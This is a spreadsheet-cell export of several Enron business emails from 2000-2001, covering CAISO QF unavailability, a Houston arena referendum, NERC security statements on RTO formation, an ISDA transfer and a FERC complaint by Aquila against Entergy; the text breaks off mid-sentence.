		 To: Frank L Davis/HOU/ECT@ECT, Karen Lambert/HOU/ECT@ECT, Tana _x000D_
Jones/HOU/ECT@ECT, Samuel Schott/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT, Sheri _x000D_
Thomas/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Bernice Rodriguez/HOU/ECT@ECT, _x000D_
Brant Reves/HOU/ECT@ECT, Debbie R Brackett/HOU/ECT@ECT, David _x000D_
Hardy/LON/ECT@ECT, Lesli Campbell/HOU/ECT@ECT, Lisa Gillette/HOU/ECT@ECT, _x000D_
Linda S Bryan/HOU/ECT@ECT, Connie Sutton/HOU/ECT@ECT, Sylvia A _x000D_
Campos/HOU/ECT@ECT, Molly Harris/HOU/ECT@ECT, Cynthia Clark/Corp/Enron@ENRON, _x000D_
Mary G Gosnell/HOU/ECT@ECT, Enron Europe Global Contracts and Facilities, _x000D_
Enron Europe Global CounterParty, Stephanie Sever/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: EOL / Credit / GCP Responses 6/7/00_x000D_
_x000D_
_x000D_
Please find attached Credit's EOL responses for 6/7/00._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Regards_x000D_
tm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Thu, 14 Dec 2000 04:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: CAISO List of Unavailable QF Facilities as of 12/11/00</t>
  </si>
  <si>
    <t>Apparently Path 15 S to N congestion_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Susan.J.Mara@enron.com on 12/14/2000 02:26:57 PM_x000D_
_x000D_
To:   "Steven Kelly" &lt;steven@iepa.com&gt;_x000D_
cc:   "Ross Ain" &lt;ain@worldnet.att.net&gt;, "Bo Buchynsky"_x000D_
      &lt;BBuchynsky@aol.com&gt;, "Bob Ellery" &lt;bellery@spi-ind.com&gt;, "Milt_x000D_
      Schultz" &lt;bfpjv@c-zone.net&gt;, "Bill Woods" &lt;billw@calpine.com&gt;, "Bill_x000D_
      Barnes" &lt;bill.barnes@lgeenergy.com&gt;, "Carolyn Baker"_x000D_
      &lt;cabaker@duke-energy.com&gt;, "Kate Castillo"_x000D_
      &lt;ccastillo@riobravo-gm.com&gt;, "Cody Carter"_x000D_
      &lt;cody.carter@williams.com&gt;, "Curtis Kebler"_x000D_
      &lt;curtis_l_kebler@reliantenergy.com&gt;, "Curt Hatton"_x000D_
      &lt;curt.hatton@gen.pge.com&gt;, "Dean Gosselin" &lt;dean_gosselin@fpl.com&gt;,_x000D_
      "Don Fuller" &lt;dfuller@caiso.com&gt;, "Diane Fellman"_x000D_
      &lt;difellman@energy-law-group.com&gt;, "Duane Nelsen"_x000D_
      &lt;dnelsen@gwfpower.com&gt;, "Dave Parquet" &lt;dparque@ect.enron.com&gt;, "Ed_x000D_
      Tomeo" &lt;ed.tomeo@uaecorp.com&gt;, "Eileen Koch" &lt;eileenk@calpine.com&gt;,_x000D_
      "Jim Willey" &lt;elliottsa@earthlink.net&gt;, "Ed Maddox"_x000D_
      &lt;emaddox@seawestwindpower.com&gt;, "Eric Eisenman"_x000D_
      &lt;eric.eisenman@neg.pge.com&gt;, "Frank Misseldine"_x000D_
      &lt;fmisseldine@caithnessenergy.com&gt;, "Frank DeRosa"_x000D_
      &lt;frank.derosa@gen.pge.com&gt;, "Robert Frees" &lt;freesrj@apci.com&gt;, "Greg_x000D_
      Blue" &lt;gtbl@dynegy.com&gt;, "Hap Boyd" &lt;hap.boyd@enron.com&gt;, "Mike_x000D_
      Hawkins" &lt;hawkins@2000energy.com&gt;, "Hal Dittmer" &lt;hedsf@aol.com&gt;,_x000D_
      "Thomas Heller" &lt;hellertj@apci.com&gt;, "Jack Pigott"_x000D_
      &lt;jackp@calpine.com&gt;, "Jeff Crowe" &lt;jcrowe@apx.com&gt;, "Jeff Dasovich"_x000D_
      &lt;jdasovic@enron.com&gt;, "Janet Heck-Doyle" &lt;jheckdoyle@aol.com&gt;, "Jim_x000D_
      Hinrichs" &lt;jmhpower@aol.com&gt;, "Joe Ronan" &lt;joer@calpine.com&gt;, "Joe_x000D_
      Greco" &lt;joe.greco@uaecorp.com&gt;, "Jorn Larsen"_x000D_
      &lt;JornL@forasenergy.com&gt;, "Jonathan Weisgall" &lt;jweisgall@aol.com&gt;,_x000D_
      "Ken Salvagno" &lt;kbssac@aol.com&gt;, "Kent Fickett" &lt;kfickett@usgen.com&gt;,_x000D_
      "Ken Hoffman" &lt;khoffman@caithnessenergy.com&gt;, "Kevin Williams"_x000D_
      &lt;kwilliams@envres.org&gt;, "Lynn Lednicky" &lt;lale@dynegy.com&gt;, "Marty_x000D_
      McFadden" &lt;marty_mcfadden@ogden-energy.com&gt;, "Tandy McMannes"_x000D_
      &lt;mcmannes@aol.com&gt;, "Paula Soos" &lt;paula_soos@ogden-energy.com&gt;, "John_x000D_
      Prevost" &lt;plenv01@northcoast.com&gt;, "Don Scholl" &lt;PurEnergyI@aol.com&gt;,_x000D_
      "Phil Reese" &lt;rcsc@west.net&gt;, "Bob Escalante"_x000D_
      &lt;rescalante@riobravo-gm.com&gt;, "Randy Hickok"_x000D_
      &lt;rjhickok@duke-energy.com&gt;, "Rob Lamkin" &lt;rllamkin@seiworldwide.com&gt;,_x000D_
      "Roger Pelote" &lt;roger.pelote@williams.com&gt;, "Bill Adams"_x000D_
      &lt;sangorgon@aol.com&gt;, "Steve Iliff" &lt;siliff@riobravo-gm.com&gt;, "Scott_x000D_
      Noll" &lt;snoll@thermoecotek.com&gt;, "Marks, Stan"_x000D_
      &lt;stan.marks@nrgenergy.com&gt;, "Steve Ponder" &lt;steve_ponder@fpl.com&gt;,_x000D_
      "Susan J Mara" &lt;Susan_J_Mara@enron.com&gt;, "Trond Aschehoug"_x000D_
      &lt;taschehoug@thermoecotek.com&gt;, "Tony Wetzel"_x000D_
      &lt;twetzel@thermoecotek.com&gt;, "Bill Carlson" &lt;wcarlson@wm.com&gt;,_x000D_
      "William Hall" &lt;wfhall2@duke-energy.com&gt;_x000D_
_x000D_
Subject:  Re: CAISO List of Unavailable QF Facilities as of 12/11/00_x000D_
_x000D_
_x000D_
_x000D_
We are the scheduling coordinator for one of these units (Harbor Cogen)._x000D_
That unit has been offered to the ISO repeatedly and not taken.  The ISO as_x000D_
of yesterday said that it did not need to power in SP15 where the plant is_x000D_
located._x000D_
_x000D_
_x000D_
_x000D_
                    "Steven_x000D_
                    Kelly"               To:     "William Hall"_x000D_
&lt;wfhall2@duke-energy.com&gt;, "Trond Aschehoug"_x000D_
                    &lt;steven@iepa.        &lt;taschehoug@thermoecotek.com&gt;,_x000D_
"Tony Wetzel" &lt;twetzel@thermoecotek.com&gt;,_x000D_
                    com&gt;                 "Susan J Mara"_x000D_
&lt;Susan_J_Mara@enron.com&gt;, "Steve Ponder"_x000D_
                                         &lt;steve_ponder@fpl.com&gt;, "Steve_x000D_
Iliff" &lt;siliff@riobravo-gm.com&gt;, "Scott_x000D_
                    12/14/2000           Noll" &lt;snoll@thermoecotek.com&gt;,_x000D_
"Roger Pelote"_x000D_
                    11:57 AM             &lt;roger.pelote@williams.com&gt;, "Rob_x000D_
Lamkin" &lt;rllamkin@seiworldwide.com&gt;,_x000D_
                    Please               "Randy Hickok"_x000D_
&lt;rjhickok@duke-energy.com&gt;, "Paula Soos"_x000D_
                    respond to           &lt;paula_soos@ogden-energy.com&gt;,_x000D_
"Marty McFadden"_x000D_
                    "Steven              &lt;marty_mcfadden@ogden-energy.com&gt;,_x000D_
"Lynn Lednicky" &lt;lale@dynegy.com&gt;,_x000D_
                    Kelly"               "Kent Fickett"_x000D_
&lt;kfickett@usgen.com&gt;, "Ken Hoffman"_x000D_
                                         &lt;khoffman@caithnessenergy.com&gt;,_x000D_
"Kate Castillo"_x000D_
                                         &lt;ccastillo@riobravo-gm.com&gt;,_x000D_
"Jonathan Weisgall" &lt;jweisgall@aol.com&gt;,_x000D_
                                         "Joe Ronan" &lt;joer@calpine.com&gt;,_x000D_
"Joe Greco" &lt;joe.greco@uaecorp.com&gt;, "Jim_x000D_
                                         Willey" &lt;elliottsa@earthlink.net&gt;,_x000D_
"Jeff Dasovich" &lt;jdasovic@enron.com&gt;,_x000D_
                                         "Jack Pigott" &lt;jackp@calpine.com&gt;,_x000D_
"Hap Boyd" &lt;hap.boyd@enron.com&gt;, "Greg_x000D_
                                         Blue" &lt;gtbl@dynegy.com&gt;, "Frank_x000D_
DeRosa" &lt;frank.derosa@gen.pge.com&gt;, "Eric_x000D_
                                         Eisenman"_x000D_
&lt;eric.eisenman@neg.pge.com&gt;, "Eileen Koch"_x000D_
                                         &lt;eileenk@calpine.com&gt;, "Ed Tomeo"_x000D_
&lt;ed.tomeo@uaecorp.com&gt;, "Duane Nelsen"_x000D_
                                         &lt;dnelsen@gwfpower.com&gt;, "Dean_x000D_
Gosselin" &lt;dean_gosselin@fpl.com&gt;, "Dave_x000D_
                                         Parquet" &lt;dparque@ect.enron.com&gt;,_x000D_
"Curtis Kebler"_x000D_
_x000D_
&lt;curtis_l_kebler@reliantenergy.com&gt;, "Curt Hatton"_x000D_
                                         &lt;curt.hatton@gen.pge.com&gt;, "Cody_x000D_
Carter" &lt;cody.carter@williams.com&gt;,_x000D_
                                         "Carolyn Baker"_x000D_
&lt;cabaker@duke-energy.com&gt;, "Bob Escalante"_x000D_
                                         &lt;rescalante@riobravo-gm.com&gt;,_x000D_
"Bill Woods" &lt;billw@calpine.com&gt;, "Bill_x000D_
                                         Carlson" &lt;wcarlson@wm.com&gt;, "Ross_x000D_
Ain" &lt;ain@worldnet.att.net&gt;, "Thomas_x000D_
                                         Heller" &lt;hellertj@apci.com&gt;,_x000D_
"Tandy McMannes" &lt;mcmannes@aol.com&gt;, "Robert_x000D_
                                         Frees" &lt;freesrj@apci.com&gt;, "Phil_x000D_
Reese" &lt;rcsc@west.net&gt;, "Milt Schultz"_x000D_
                                         &lt;bfpjv@c-zone.net&gt;, "Mike Hawkins"_x000D_
&lt;hawkins@2000energy.com&gt;, "Marks,_x000D_
                                         Stan" &lt;stan.marks@nrgenergy.com&gt;,_x000D_
"Kevin Williams"_x000D_
                                         &lt;kwilliams@envres.org&gt;, "Ken_x000D_
Salvagno" &lt;kbssac@aol.com&gt;, "Jorn Larsen"_x000D_
                                         &lt;JornL@forasenergy.com&gt;, "John_x000D_
Prevost" &lt;plenv01@northcoast.com&gt;, "Jim_x000D_
                                         Hinrichs" &lt;jmhpower@aol.com&gt;,_x000D_
"Jeff Crowe" &lt;jcrowe@apx.com&gt;, "Janet_x000D_
                                         Heck-Doyle" &lt;jheckdoyle@aol.com&gt;,_x000D_
"Hal Dittmer" &lt;hedsf@aol.com&gt;, "Frank_x000D_
                                         Misseldine"_x000D_
&lt;fmisseldine@caithnessenergy.com&gt;, "Ed Maddox"_x000D_
                                         &lt;emaddox@seawestwindpower.com&gt;,_x000D_
"Don Scholl" &lt;PurEnergyI@aol.com&gt;, "Diane_x000D_
                                         Fellman"_x000D_
&lt;difellman@energy-law-group.com&gt;, "Bob Ellery"_x000D_
                                         &lt;bellery@spi-ind.com&gt;, "Bo_x000D_
Buchynsky" &lt;BBuchynsky@aol.com&gt;, "Bill Barnes"_x000D_
                                         &lt;bill.barnes@lgeenergy.com&gt;, "Bill_x000D_
Adams" &lt;sangorgon@aol.com&gt;_x000D_
                                         cc:     "Don Fuller"_x000D_
&lt;dfuller@caiso.com&gt;_x000D_
                                         Subject:     CAISO List of_x000D_
Unavailable QF Facilities as of 12/11/00_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Attached is the list the CAISO has for QF units "unavailable" as of_x000D_
12/11/00.  The CAISO would like help in (1) identifying any units on the_x000D_
list which are unoperable (i.e. shut down,  out for maintenance and not_x000D_
able_x000D_
to come up, etc)., (1) identifying reasons why QFs are unable to increase_x000D_
production, and (3) contacting QFs that could increase production to meet_x000D_
the present emergency._x000D_
_x000D_
Responses to these inquiries should be directed to Don Fuller at the CAISO_x000D_
[dfuller@caiso.com].  So that we remain informed, please cc any emails to_x000D_
Don Fuller to me here at IEP.  Thanks._x000D_
_x000D_
_x000D_
_x000D_
----- Original Message -----_x000D_
From: Long, Francine &lt;FLong@caiso.com&gt;_x000D_
To: Kelly, Steven &lt;steven@iepa.com&gt;_x000D_
Sent: Thursday, December 14, 2000 11:16 AM_x000D_
Subject: Document from Don Fuller_x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt; &gt;  &lt;&lt;qf_tracy.xls&gt;&gt;_x000D_
&gt; &gt;_x000D_
&gt; -FML_x000D_
&gt; &gt; Francine M. Long_x000D_
&gt; &gt; Executive Assistant, Client Services_x000D_
&gt; &gt; Phone: (916) 351-2207  Fax: (916) 351-2350_x000D_
&gt; &gt; E-mail: flong@caiso.com_x000D_
&gt; &gt; "There is no fate but what we make for ourselves"_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt;_x000D_
_x000D_
(See attached file: qf_tracy.xls)_x000D_
_x000D_
_x000D_
(See attached file: qf_tracy.xls)_x000D_
_x000D_
_x000D_
_x000D_
 - qf_tracy.xls</t>
  </si>
  <si>
    <t>Thu, 3 Aug 2000 12:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Downtown Arena- HHCC asked to give public comments to_x000D_
 Construction Committee this week</t>
  </si>
  <si>
    <t xml:space="preserve">I would like your insights.   Meredith, I'd like yours as well (particularly _x000D_
in light of the messageyou received from Lawson and Jefferson)._x000D_
_x000D_
_x000D_
_x000D_
Laura Schwartz@ENRON_x000D_
08/02/2000 08:22 AM_x000D_
_x000D_
_x000D_
To: Steven J Kean/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Re: Downtown Arena- HHCC asked to give public comments to _x000D_
Construction Committee this week_x000D_
_x000D_
Steve,_x000D_
_x000D_
Please let me know if there is anything you would like me to do regarding _x000D_
this matter._x000D_
_x000D_
Thanks,_x000D_
Laura_x000D_
---------------------- Forwarded by Laura Schwartz/Corp/Enron on 08/02/2000 _x000D_
09:11 AM ---------------------------_x000D_
   _x000D_
	Enron Investment Partners_x000D_
	_x000D_
	From:  Mark Lay @ ECT                           08/01/2000 04:47 PM_x000D_
	_x000D_
_x000D_
To: Steven J Kean/HOU/EES@EES_x000D_
cc: Laura Schwartz/Corp/Enron@Enron _x000D_
_x000D_
Subject: Re: Downtown Arena- HHCC asked to give public comments to _x000D_
Construction Committee this week  _x000D_
_x000D_
Steve,_x000D_
_x000D_
I don't want to get caught in a crossfire here, so I thought your group could _x000D_
give me some guidance.  _x000D_
_x000D_
I think the referendum is very important for the city and will help us _x000D_
continue to show Houston as a significant metropolitan area.  I am not _x000D_
convinced that the ultimate form of the deal for minority participation in _x000D_
Enron Field was, in fact, what was intended.  In that agreement, Aramark owns _x000D_
all of the concessions, but has a 30% profit share with minorities.  My _x000D_
understanding is that there are no minority owned businesses in that deal._x000D_
_x000D_
I would like to communicate this sentiment, but I would also, certainly like _x000D_
to reinforce Enron's position._x000D_
_x000D_
Thanks,_x000D_
Mark_x000D_
_x000D_
_x000D_
_x000D_
"Richard R. Torres" &lt;rtorres@argolink.net&gt; on 08/01/2000 03:44:25 PM_x000D_
To: &lt;ralvarado@betterbags.com&gt;, &lt;hcardenas@montylawfirm.com&gt;, _x000D_
&lt;jcl1005@aol.com&gt;, &lt;ecolon@llgm.com&gt;, &lt;leo@boonedeleon.com&gt;, _x000D_
&lt;irma@etchouston.com&gt;, &lt;Manuel.J.Espinoza@us.pwcglobal.com&gt;, _x000D_
&lt;evelio.fernandez@goya.com&gt;, &lt;peccorp1@msn.com&gt;, &lt;Lupef@tejasoffice.com&gt;, _x000D_
&lt;divagarza@aol.com&gt;, &lt;cgarza@admin4.hsc.uth.tmc.edu&gt;, _x000D_
&lt;tgrijalva@gacompanies.com&gt;, &lt;John.Hernandez@chase.com&gt;, _x000D_
&lt;shunsaker@lockeliddell.com&gt;, &lt;Rick.C.Jaramillo@bankofamerica.com&gt;, _x000D_
&lt;Mark.Lay@enron.com&gt;, &lt;manuel_d_leal@txs.uscourts.gov&gt;, _x000D_
&lt;yolanda.f.londono@chase.com&gt;, &lt;lmcmai@coair.com&gt;, &lt;pmendoza@staffmark.com&gt;, _x000D_
&lt;highmark@neosoft.com&gt;, &lt;gmir@mfrgroup.com&gt;, &lt;cesarnav@aol.com&gt;, _x000D_
&lt;alex@lopeznegrete.com&gt;, &lt;ramos_s@hccs.cc.tx.us&gt;, &lt;ricreyes@flash.net&gt;, _x000D_
&lt;gsaenz@ogs-law.com&gt;, &lt;vanessa@friersoncpa.com&gt;, &lt;rtorres85@argolink.net&gt;, _x000D_
&lt;drtrevino@trevinogroup.com&gt;, &lt;jatrevino@univision.net&gt;, _x000D_
&lt;gougeks@texaco.com&gt;, &lt;randyvelarde@theplazagrp.com&gt;, &lt;massey@ptg.com&gt;, _x000D_
&lt;mweitzman@aeromexico.com&gt;, &lt;rz2743@sbc.com&gt;_x000D_
cc:  _x000D_
Subject: Downtown Arena- HHCC asked to give public comments to Construction _x000D_
Committee this week_x000D_
_x000D_
_x000D_
Dear Board Member-_x000D_
_x000D_
As you may already know, we have been working with the Harris County-Houston_x000D_
Sports Authority to have included in their agreement with the Houston_x000D_
Rockets a 30% minority participation goal in the design, construction and_x000D_
operation of a downtown basketball arena.  This is the same commitment that_x000D_
we received from the Rockets in 1999.  We received a commitment from the_x000D_
sports authority and the mayor's office that the minority participation goal_x000D_
of 30% will be included in the contract.  We have met with Celena Garza and_x000D_
communicated with Al Luna our interests and they have expressed their_x000D_
support for our position.  We have also asked Sen. Mario Gallegos for his_x000D_
support and received it._x000D_
_x000D_
We are in the process of confirming that our language calling for such goal_x000D_
has been included in the final document and that Al Luna and Celena Garza_x000D_
are sufficiently satisfied with the language, which will be voted on later_x000D_
this week._x000D_
_x000D_
Once confirmed, Sonny Flores, Chairman of the Economic Development Committee_x000D_
has recommended to Massey that the Chamber be prepared to offer some sort of_x000D_
public statement in support or not supporting a referendum to build the_x000D_
arena.  (We have been asked to address the Construction Committee of the_x000D_
sports authority by Billy Burge and Wayne Smith)  Sonny has indicated that_x000D_
once we have a confirmation from Al and Celena, our interests should be_x000D_
sufficiently covered and that supporting the referendum would be good for_x000D_
Hispanic businesses._x000D_
_x000D_
Massey has asked that I poll the board for its input and get a majority_x000D_
commitment from the board so as to move forward in offering support or no_x000D_
support for the referendum.  Ordinarily, this would be discussed and_x000D_
considered at a meeting of the Board of Directors, however, since the sports_x000D_
authority posted its meeting notice (72 hours prior to meeting) and is ready_x000D_
to proceed with its approval of the Letter Agreement with the Houston_x000D_
Rockets we are seeking input in this manner._x000D_
_x000D_
I am attaching a copy of the Memorandum of Understanding between the Chamber_x000D_
and the Sports Authority for you review.  There have been no revisions to_x000D_
the last copy that was circulated at the past Executive Committee meeting at_x000D_
Tony Grijalva's office._x000D_
_x000D_
Massey has asked that you respond with your input, suggestions and position_x000D_
for or not for the chamber offering its support for the arena via e-mail_x000D_
within 24 hours of this notice.  The chamber's position will be determined_x000D_
by the majority of those respondents to this e-mail by no later than 4:00_x000D_
p.m. CDT on Wednesday, August 2, 2000._x000D_
_x000D_
 - Sports Authority MOU, July 20, 2000.doc_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 26 Sep 2001 09:53:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'pat.shortridge@enron.com', 'richard.ingersoll@enron.com', 'ray.alvarez@enron.com', 'alan.comnes@enron.com', 'linda.robertson@enron.com', 'steve.walton@enron.com', 'john.shelk@enron.com', 'luiz.maurer@enron.com', 'tom.hoatson@enron.com', 'donna.fulton@enron.com', 'andy.rodriquez@enron.com', 'sarah.novosel@enron.com', 'michael.roan@enron.com', 'dan.staines@enron.com', 'richard.shapiro@enron.com', 'thane.twiggs@enron.com', 'd..steffes@enron.com', 'l..nicolay@enron.com', 'charles.yeung@enron.com', 'howard.fromer@enron.com', 'daniel.allegretti@enron.com', 'joe.connor@enron.com'})</t>
  </si>
  <si>
    <t>RE: NERC Statements on Impact of Security Threats on RTOs</t>
  </si>
  <si>
    <t xml:space="preserve">Christi,_x000D_
_x000D_
The NERC statements clearly seem to indicate they feel threatened by the RTO formation process and EISB._x000D_
_x000D_
Frankly, nothing stated anywhere in the attachments hasn't already been thought out and handled by the three ISOs in the East and the CAISO as well.  All four of these entities have fully functional back-up facilities in other parts of their regions and NERC is fully aware of them.  I would assume ERCOT also has a fully functional, redundant control scheme in place as well._x000D_
_x000D_
In the case of NY there is another site physically apart from the main control center which has a fully redundant computer and communications system.  They have (or used to have) plans which in the event neither center is available, can revert control back to the TOs (heaven forbid)  until ISO personnel can resume control of the grid.  So they have 3 sets of redundancy, in addition to radio and satellite communications if necessary._x000D_
_x000D_
Earlier RTO West discussions all contained similar concerns and plans for redundancy and the DSTAR preliminary design documents also plan on redundancy.  NERCs assertion that they would "slow-down" the RTO formation process is absurd (geez, it's going too slow now!!!). _x000D_
_x000D_
Running distributed, synchronized computer networks is not rocket science...how do the folks at NERC explain the NYSE quick recovery from a ground zero attack?  There was no report of crippling loss of financial information...at least that I am aware of.  Even a small operation like APX operates their systems using distributed computing and synchronized data._x000D_
_x000D_
For NERC to use the NIMDA virus as a specific attack on the electrical grid operation and the compromising of reliability is preposterous and the resulting "service denials" cited are probably refusal(s) of tags, which from what I understand, the utilities probably cause much more self-inflicted havoc than this virus!_x000D_
_x000D_
The press release you refer to just confirms NERC's position of maintaining status quo.  Should we "call" NERC on these statements?  The remarks made in these public statements seem irresponsible._x000D_
_x000D_
Kind Regards,_x000D_
_x000D_
Dave _x000D_
_x000D_
-----Original Message-----_x000D_
From: Nicolay, Christi L. _x000D_
Sent: Wednesday, September 26, 2001 9:11 AM_x000D_
To: Shapiro, Richard; Steffes, James D.; Robertson, Linda; Shelk, John;_x000D_
Yeung, Charles; Ingersoll, Richard; Rodriquez, Andy; Novosel, Sarah;_x000D_
Fulton, Donna; Alvarez, Ray; Roan, Michael; Maurer, Luiz; Connor, Joe;_x000D_
Walton, Steve; Comnes, Alan; Perrino, Dave; Staines, Dan; Fromer,_x000D_
Howard; Allegretti, Daniel; Hoatson, Tom; Twiggs, Thane; Shortridge, Pat_x000D_
Subject: FW: NERC Statements on Impact of Security Threats on RTOs_x000D_
_x000D_
_x000D_
Our NERC folks should be able to shed more light on why NERC is making statements that on their face look anti-large RTO (the other emails and comments in these document look more like "this should be reviewed".)_x000D_
Do we (and other market participants) need to have a computer systems group perform a study that includes redunancy issues, etc. to counter this?  Certainly, Pat Wood and Nora Brownell's testimony to Congress indicate that they believe that large RTOs will bring more security and reliability (we have included this in our SE RTO mediation comments.)_x000D_
_x000D_
-----Original Message-----_x000D_
From: Michael Reddy [mailto:Mreddy@epsa.org]_x000D_
Sent: Tuesday, September 25, 2001 4:09 PM_x000D_
To: acomnes@enron.com; Hawkins, Bernadette; Nersesian, Carin; Yeung,_x000D_
Charles; Nicolay, Christi L.; Fulton, Donna; Scheuer, Janelle; Hartsoe,_x000D_
Joe; Shelk, John; Jsteffe@enron.com; Noske, Linda J.; Robertson, Linda;_x000D_
Alvarez, Ray; Shapiro, Richard; Novosel, Sarah; Mara, Susan; Lindberg,_x000D_
Susan; Hoatson, Tom_x000D_
Subject: NERC Statements on Impact of Security Threats on RTOs_x000D_
_x000D_
_x000D_
MEMORANDUM_x000D_
_x000D_
TO: Legislative Affairs Committee_x000D_
       Regulatory Affairs Committee_x000D_
       NAERO Working Group_x000D_
_x000D_
FROM: Scott Weiner, Legislative Affairs Committee Chair_x000D_
             Jim Steffes, Regulatory Affairs Committee Chair_x000D_
             Mark Bennett, Senior Manager of Policy_x000D_
             Donn Salvosa, Manager of Government Affairs_x000D_
_x000D_
DATE: September 25, 2001_x000D_
_x000D_
RE: NERC Statements on Impact of Security Threats on RTOs_x000D_
_x000D_
The attached e-mail in Microsoft Word form contains statements that NERC made during a recent meeting with members of the national press.  The statements concern NERC's view of the implications of terrorist threats for FERC's " Four RTO policy" set forth in its July 12th Order.  The statements also may bear upon the effort to establish a new standards setting organization, particularly the possibility that NERC's responsibilities could be shifted to EISB.  Also attached is an article containing the views of R.J. Rudden Associates, Inc. that discusses the risks associated with centralizing control center operations._x000D_
_x000D_
Specifically, NERC representatives informed the press that on September 11 "the grid was the target of an insidious cyber attack that shut down some facilities...from an information administration standpoint."  They noted that this resulted in service denials, although it is not clear whether they indicated where or how much.  This event was attributed to the so-called "NIMBA virus"._x000D_
_x000D_
NERC's statements suggest a new strategy to preserve the role they've played not only in security matters, but possibly other aspects pertaining to "reliability standards."  They warn against any immediate transition to fewer RTOs as envisioned in FERC's July 12th Order.  Moreover, it is likely that NERC will argue that, given its expertise and experience, recent events make transitioning to a new standards organization (EISB?) ill advised.  _x000D_
_x000D_
It is unclear what, if any, impact all this may have on RTO development, the legislative effort to establish a new reliability standards body or the NERC Board's consideration of pending reform proposals at its October meeting.  However, we can expect security related issues to be included in future discussions of these matters. _x000D_
_x000D_
Please provide your reactions to the NERC statements to Mark Bennett at 202-628-8200 or mbennett@epsa.org_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Feb 2001 03:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>more pics</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Matthew Lenhart/HOU/ECT on 02/13/2001 _x000D_
11:46 AM ---------------------------_x000D_
_x000D_
_x000D_
Susan M Scott_x000D_
02/13/2001 10:42 AM_x000D_
To: Matthew Lenhart/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: more pics_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Susan M Scott/HOU/ECT on 02/13/2001 11:41 _x000D_
AM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Lisa Gillette                           02/13/2001 10:08 AM_x000D_
	_x000D_
_x000D_
To: Susan M Scott/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: more pics_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Lisa Gillette/HOU/ECT on 02/13/2001 10:04 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Daniel Diamond_x000D_
02/13/2001 08:52 AM_x000D_
To: Bryan Hull/HOU/ECT@ECT, Lisa Gillette/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: more pics_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Daniel Diamond/HOU/ECT on 02/13/2001 _x000D_
08:51 AM ---------------------------_x000D_
_x000D_
_x000D_
ddiamond &lt;ddiamond@pdq.net&gt;@pdq.net&gt; on 02/11/2001 01:47:28 PM_x000D_
To: daniel.diamond@enron.com_x000D_
cc:  _x000D_
Subject: more pics_x000D_
_x000D_
_x000D_
pics_x000D_
_x000D_
_x000D_
 - Gmoney.jpg_x000D_
 - Hully.JPG_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 30 May 2000 02:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rmartins@utilicorp.com'})</t>
  </si>
  <si>
    <t>ISDA</t>
  </si>
  <si>
    <t>Russell:_x000D_
I spoke with the contact that you left me last week and she indicated that _x000D_
the ISDA had not yet been signed but that in all likelihood it would be _x000D_
signed in a few days.  I asked Susan bailey to send you the certificate with _x000D_
resolutions that you requested along with a new draft of the Transfer _x000D_
Agreement which has a blank for the date.  My thought was that everything _x000D_
would become effective on the date that we insert in the Transfer Agreement _x000D_
and I would ask that you coordinate with Susan bailey when you know what that _x000D_
date will be so that we can make sure that our systems reflect when the _x000D_
trades are to be confirmed under the Utilicorp Master.  Thanks._x000D_
_x000D_
_x000D_
Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)</t>
  </si>
  <si>
    <t>Tue, 16 Jan 2001 05:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Sally,_x000D_
_x000D_
Congratulations._x000D_
_x000D_
Vince</t>
  </si>
  <si>
    <t>Wed, 15 Mar 2000 07:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'bill.moore@enron.com', 'greg.woulfe@enron.com', 'patrick.hanse@enron.com', 'mary.hain@enron.com', 'tom.dutta@enron.com', 'bill.rust@enron.com', 'john.moore@enron.com', 'lloyd.will@enron.com', 'kathleen.magruder@enron.com', 'marchris.robinson@enron.com', 'kevin.presto@enron.com'})</t>
  </si>
  <si>
    <t>Aquila v. Entergy</t>
  </si>
  <si>
    <t>On 3/30/98, Aquila filed a complaint at FERC against Entergy that Entergy _x000D_
reserved all of the firm import capacity (2000 MW) at four key interfaces, _x000D_
even though Entergy did not designate any off-system network resources to _x000D_
cover these reservations.  Aquila's transmission requests were denied or _x000D_
curtailed causing it to suffer financial losses.  Entergy responded that _x000D_
Aquila had a "fundamental misunderstanding" of Order No. 888 et seq. and that _x000D_
a transmission provider may deny tariff requests, if that transmission _x000D_
provider's own reservations "are based on the legitimate reliability needs" _x000D_
of its bundled retail customers._x000D_
_x000D_
Reservation facts:  Entergy posted on its OASIS site that it reserved 2000 MW _x000D_
of capacity at its interfaces with TVA (1100 MW), Southern (400 MW), Arkansas _x000D_
Electric Coop (250 MW), and Union Electric (250 MW) under the label "Firm _x000D_
Import for Native Load."  Entergy did not designate network resources in the _x000D_
same manner that it required from Aquila and other network customers.  _x000D_
Entergy explained that its reservations were needed "to meet the immediate _x000D_
reliability needs of the Entergy System and to accommodate native load growth _x000D_
over the next few years."  (Entergy later told FERC that this was needed for _x000D_
